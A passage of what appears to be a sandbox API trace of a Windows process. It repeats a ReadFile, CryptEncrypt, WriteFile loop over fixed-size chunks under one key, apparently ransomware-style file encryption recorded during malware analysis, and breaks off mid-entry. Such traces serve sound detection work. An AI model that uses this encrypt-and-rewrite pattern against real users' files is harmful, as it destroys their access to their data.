[0279.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.149] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.150] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.151] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.154] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.155] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, 